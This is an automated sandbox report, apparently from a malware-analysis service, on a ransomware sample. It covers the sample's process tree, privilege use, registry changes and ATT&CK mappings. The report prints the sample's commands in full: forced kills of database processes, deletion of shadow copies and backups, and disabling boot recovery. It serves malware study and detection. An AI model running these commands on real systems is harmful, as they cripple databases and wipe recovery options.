2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe

Suspicious use of AdjustPrivilegeToken 35 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeWMIC.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	2616	taskkill.exe
Token: SeDebugPrivilege	2988	taskkill.exe
Token: SeDebugPrivilege	824	taskkill.exe
Token: SeDebugPrivilege	1576	taskkill.exe
Token: SeDebugPrivilege	1668	taskkill.exe
Token: SeDebugPrivilege	2960	taskkill.exe
Token: SeDebugPrivilege	476	taskkill.exe
Token: SeDebugPrivilege	2424	taskkill.exe
Token: SeDebugPrivilege	380	taskkill.exe
Token: SeDebugPrivilege	2256	taskkill.exe
Token: SeDebugPrivilege	1004	taskkill.exe
Token: SeDebugPrivilege	1144	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3008	WMIC.exe
Token: SeSecurityPrivilege	3008	WMIC.exe
Token: SeTakeOwnershipPrivilege	3008	WMIC.exe
Token: SeLoadDriverPrivilege	3008	WMIC.exe
Token: SeSystemProfilePrivilege	3008	WMIC.exe
Token: SeSystemtimePrivilege	3008	WMIC.exe
Token: SeProfSingleProcessPrivilege	3008	WMIC.exe
Token: SeIncBasePriorityPrivilege	3008	WMIC.exe
Token: SeCreatePagefilePrivilege	3008	WMIC.exe
Token: SeBackupPrivilege	3008	WMIC.exe
Token: SeRestorePrivilege	3008	WMIC.exe
Token: SeShutdownPrivilege	3008	WMIC.exe
Token: SeDebugPrivilege	3008	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3008	WMIC.exe
Token: SeRemoteShutdownPrivilege	3008	WMIC.exe
Token: SeUndockPrivilege	3008	WMIC.exe
Token: SeManageVolumePrivilege	3008	WMIC.exe
Token: 33	3008	WMIC.exe
Token: 34	3008	WMIC.exe
Token: 35	3008	WMIC.exe
Token: SeBackupPrivilege	320	vssvc.exe
Token: SeRestorePrivilege	320	vssvc.exe
Token: SeAuditPrivilege	320	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2816 wrote to memory of 2832	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2816 wrote to memory of 2832	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2816 wrote to memory of 2832	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2816 wrote to memory of 2832	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2832 wrote to memory of 2640	2832	cmd.exe	cmd.exe
PID 2832 wrote to memory of 2640	2832	cmd.exe	cmd.exe
PID 2832 wrote to memory of 2640	2832	cmd.exe	cmd.exe
PID 2832 wrote to memory of 2640	2832	cmd.exe	cmd.exe
PID 2816 wrote to memory of 2004	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2816 wrote to memory of 2004	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2816 wrote to memory of 2004	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2816 wrote to memory of 2004	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2004 wrote to memory of 2604	2004	cmd.exe	cmd.exe
PID 2004 wrote to memory of 2604	2004	cmd.exe	cmd.exe
PID 2004 wrote to memory of 2604	2004	cmd.exe	cmd.exe
PID 2004 wrote to memory of 2604	2004	cmd.exe	cmd.exe
PID 2604 wrote to memory of 2616	2604	cmd.exe	taskkill.exe
PID 2604 wrote to memory of 2616	2604	cmd.exe	taskkill.exe
PID 2604 wrote to memory of 2616	2604	cmd.exe	taskkill.exe
PID 2816 wrote to memory of 2812	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2816 wrote to memory of 2812	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2816 wrote to memory of 2812	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2816 wrote to memory of 2812	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2812 wrote to memory of 1640	2812	cmd.exe	cmd.exe
PID 2812 wrote to memory of 1640	2812	cmd.exe	cmd.exe
PID 2812 wrote to memory of 1640	2812	cmd.exe	cmd.exe
PID 2812 wrote to memory of 1640	2812	cmd.exe	cmd.exe
PID 1640 wrote to memory of 1572	1640	cmd.exe	taskkill.exe
PID 1640 wrote to memory of 1572	1640	cmd.exe	taskkill.exe
PID 1640 wrote to memory of 1572	1640	cmd.exe	taskkill.exe
PID 2816 wrote to memory of 2956	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2816 wrote to memory of 2956	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2816 wrote to memory of 2956	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2816 wrote to memory of 2956	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2956 wrote to memory of 3016	2956	cmd.exe	cmd.exe
PID 2956 wrote to memory of 3016	2956	cmd.exe	cmd.exe
PID 2956 wrote to memory of 3016	2956	cmd.exe	cmd.exe
PID 2956 wrote to memory of 3016	2956	cmd.exe	cmd.exe
PID 3016 wrote to memory of 2988	3016	cmd.exe	taskkill.exe
PID 3016 wrote to memory of 2988	3016	cmd.exe	taskkill.exe
PID 3016 wrote to memory of 2988	3016	cmd.exe	taskkill.exe
PID 2816 wrote to memory of 2624	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2816 wrote to memory of 2624	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2816 wrote to memory of 2624	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2816 wrote to memory of 2624	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2624 wrote to memory of 2364	2624	cmd.exe	cmd.exe
PID 2624 wrote to memory of 2364	2624	cmd.exe	cmd.exe
PID 2624 wrote to memory of 2364	2624	cmd.exe	cmd.exe
PID 2624 wrote to memory of 2364	2624	cmd.exe	cmd.exe
PID 2364 wrote to memory of 824	2364	cmd.exe	taskkill.exe
PID 2364 wrote to memory of 824	2364	cmd.exe	taskkill.exe
PID 2364 wrote to memory of 824	2364	cmd.exe	taskkill.exe
PID 2816 wrote to memory of 1992	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2816 wrote to memory of 1992	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2816 wrote to memory of 1992	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 2816 wrote to memory of 1992	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe
PID 1992 wrote to memory of 1956	1992	cmd.exe	cmd.exe
PID 1992 wrote to memory of 1956	1992	cmd.exe	cmd.exe
PID 1992 wrote to memory of 1956	1992	cmd.exe	cmd.exe
PID 1992 wrote to memory of 1956	1992	cmd.exe	cmd.exe
PID 1956 wrote to memory of 1576	1956	cmd.exe	taskkill.exe
PID 1956 wrote to memory of 1576	1956	cmd.exe	taskkill.exe
PID 1956 wrote to memory of 1576	1956	cmd.exe	taskkill.exe
PID 2816 wrote to memory of 1724	2816	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe	cmd.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1208

C:\Users\Admin\AppData\Local\Temp\97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
"C:\Users\Admin\AppData\Local\Temp\97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2816

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
3⤵
- Suspicious use of WriteProcessMemory
PID:2832

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
4⤵
PID:2640

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2004

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2604

C:\Windows\system32\taskkill.exe
taskkill -f -im sqlbrowser.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2616

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2812

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:1640

C:\Windows\system32\taskkill.exe
taskkill -f -im sql writer.exe
5⤵
- Kills process with taskkill
PID:1572

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2956

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3016

C:\Windows\system32\taskkill.exe
taskkill -f -im sqlserv.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2988

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2624

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2364

C:\Windows\system32\taskkill.exe
taskkill -f -im msmdsrv.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:824

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1992

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:1956

C:\Windows\system32\taskkill.exe
taskkill -f -im MsDtsSrvr.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1576

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
3⤵
PID:1724

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
4⤵
PID:1068

C:\Windows\system32\taskkill.exe
taskkill -f -im sqlceip.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1668

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
3⤵
PID:2888

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
4⤵
PID:2068

C:\Windows\system32\taskkill.exe
taskkill -f -im fdlauncher.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2960

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
3⤵
PID:1692

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
4⤵
PID:656

C:\Windows\system32\taskkill.exe
taskkill -f -im Ssms.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:476

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
3⤵
PID:1348

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
4⤵
PID:1076

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
3⤵
PID:3060

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
4⤵
PID:724

C:\Windows\system32\taskkill.exe
taskkill -f -im fdhost.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:380

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
3⤵
PID:792

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
4⤵
PID:3056

C:\Windows\system32\taskkill.exe
taskkill -f -im ReportingServicesService.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2256

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
3⤵
PID:1828

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
4⤵
PID:2000

C:\Windows\system32\taskkill.exe
taskkill -f -im msftesql.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1004

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
3⤵
PID:2472

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
4⤵
PID:2180

C:\Windows\system32\taskkill.exe
taskkill -f -im pg_ctl.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1144

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
3⤵
PID:1928

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
4⤵
PID:744

C:\Windows\system32\taskkill.exe
taskkill -f -impostgres.exe
5⤵
- Kills process with taskkill
PID:944

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
3⤵
PID:1608

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
4⤵
PID:1048

C:\Windows\system32\net.exe
net stop MSSQLServerADHelper100
5⤵
PID:2548

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100
6⤵
PID:864

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
3⤵
PID:2796

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
4⤵
PID:904

C:\Windows\system32\net.exe
net stop MSSQL$ISARS
5⤵
PID:620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$ISARS
6⤵
PID:3032

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
3⤵
PID:684

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
3⤵
PID:2500

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
4⤵
PID:1712

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
3⤵
PID:984

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
4⤵
PID:2040

C:\Windows\system32\net.exe
net stop SQLAgent$MSFW
5⤵
PID:3028

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$MSFW
6⤵
PID:2212

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
3⤵
PID:2108

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
4⤵
PID:1936

C:\Windows\system32\net.exe
net stop SQLBrowser
5⤵
PID:2192

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLBrowser
6⤵
PID:2336

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
3⤵
PID:2064

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
4⤵
PID:1332

C:\Windows\system32\net.exe
net stop REportServer$ISARS
5⤵
PID:1728

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop REportServer$ISARS
6⤵
PID:1504

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
3⤵
PID:2400

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
4⤵
PID:2120

C:\Windows\system32\net.exe
net stop SQLWriter
5⤵
PID:2528

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLWriter
6⤵
PID:2308

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
3⤵
PID:2692

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
4⤵
PID:1564

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
5⤵
- Interacts with shadow copies
PID:2584

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
3⤵
PID:2728

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
4⤵
PID:2504

C:\Windows\system32\wbadmin.exe
wbadmin delete backup -keepVersion:0 -quiet
5⤵
- Deletes system backups
- Drops file in Windows directory
PID:2700

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
3⤵
PID:2840

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
4⤵
PID:2600

C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
5⤵
- Deletes System State backups
PID:2884

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
3⤵
PID:796

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
4⤵
PID:2596

C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
5⤵
- Modifies boot configuration data using bcdedit
PID:2364

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
3⤵
PID:2516

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
4⤵
PID:2752

C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoverynabled No
5⤵
- Modifies boot configuration data using bcdedit
PID:2568

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
3⤵
PID:1816

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
4⤵
PID:1872

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe SHADOWCOPY /nointeractive
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3008

C:\Windows\SysWOW64\cmd.exe
\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
3⤵
PID:2856

C:\Users\Admin\AppData\Local\Temp\97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe
\\?\C:\Users\Admin\AppData\Local\Temp\97a877b999fb2a3c8286548ac4b20f364a862b132a87272fe273c670a654ba8d.exe -network
2⤵
- System policy modification
PID:1688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c pause
3⤵
PID:2928

C:\Windows\system32\taskkill.exe
taskkill -f -im SQLAGENT.EXE
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2424

C:\Windows\system32\net.exe
net stop MSSQL$MSFW
1⤵
PID:1616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$MSFW
2⤵
PID:2496

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
1⤵
PID:836

C:\Windows\system32\net.exe
net stop SQLAgent$ISARS
1⤵
PID:2532

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ISARS
2⤵
PID:2900

C:\Windows\system32\cmd.exe
C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
1⤵
PID:2732

C:\Windows\system32\wbadmin.exe
wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
2⤵
PID:3004

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:320

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl
Filesize
7KB

MD5
8a1668338b2571681eaab178076ede83

SHA1
31582a6be003b3a59e5234b2d4d479ed74eebe98

SHA256
9415e0945a3afa467dfb305b983fcca8deada58d61bf9f77a50e1d79d9215290

SHA512
2753139d6b5425741f920ca1b7d3f5223903f955b5017a3e2b6a306946a894c2acc77afe9642ccc454a2fc1c92a112cd4f7ef26c87768e52b010ae155232e0b2

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif
Filesize
1KB

MD5
873ac0de2e9dd3f7b3115499d90051aa

SHA1
573c092687f234d2cbfbff5015f4805446772c6b

SHA256
0364be209519b91a83007260c59eb02f38f3a6e715dca953d0507c3c31ad4964

SHA512
b0627052889599f083b6b91005b4baf513f46b135f95b0ecdba920d78e1ce958fe37e968cb2b019175f683989f6b3da77dd0ac6a6baa233a586572498ca185b9

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UTC
Filesize
1KB

MD5
c2b792dc173343406433c289df00aef1

SHA1
b141523ce842270d600787993fb24d306b6879a5

SHA256
30e3be687c9738f79d7e048d8ad6bb07dc5b8dac140bd0f30a46a5f52a7b8f12

SHA512
b5fd2d21721bc7a09157c2ced681af3334e4b90681e3a8a016eff517e8b2ae65ee2993c4fbd186c8cefc4377edb2d38664028c521348c8c65d47b1d09dfcc0c2

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5
Filesize
1KB

MD5
0138afdd45f64ba58c517f0875249cd8

SHA1
20ab8a7b0146d90b43c404ead9edb19e462e74c2

SHA256
f5770f846214e505b12fd9c3bb8eb346bbdc4d46c7990f2129b5f65017f45729

SHA512
f67c6b9bd503463b957dc817fd4fa17bf085c7fe29002e1194efef7403ab3de97e7046e0d7810ca7aec89f5e1cfa0eaefdbacc6bf7ed04d30ffa063258e04752

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\HST10
Filesize
1KB

MD5
79e54ecc489702a359c5567d9fc55213

SHA1
c9f634f06fc656110deba6276ab943a9218a1e73

SHA256
8ecd5da238fd2c97a794e3453fcc96e55b49afc905cf2a631ebb3127fc02d201

SHA512
f808e3bfcbcb276f8a538824a97400487d139676f13326ea26dbf1e6f159c93f22fa027dc98542a3cae686b2f8eba549d64ec37d4962747d3ad81a0b304fa4a6

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7
Filesize
1KB

MD5
ce5b883f175ac22cab166ebb506a780d

SHA1
37b238a6f9a6fb0ac7ed2dc579804e4fbf09c259

SHA256
b794441ea28281d77a48612ec79683c43b574a98bc63c54f72cab943c5d5e485

SHA512
c1a9588844ec25c500973431f42b88286c2a453cdac954445fe8c25877811deb5dd93af32cc85cd7ef86b46ed448b71633dbfa759ca79e7b92ea5cfed4bbdb50

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html
Filesize
13KB

MD5
747c281dd719858b03ec82d6ea942030

SHA1
4410c4d983a53a61fdcda596f1b2ab4518c0a93c

SHA256
1fe9326573af969c03eab3f79fe004cdf857c61440653f27a5b39808fc5c6f36

SHA512
0a6adec6b067bca911ede59709d0a65fd24853e828595d97aea1f36a68dc6beae2940e75a8073fb69dd7d990eea24aeceb143085b57ef917c8ddc6183cab1a3b

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html
Filesize
10KB

MD5
9c4fc99f52cccc09ced7a167b0ca89cc

SHA1
34279adb2eb23985c5a2951a83eb0f2cfdcec413

SHA256
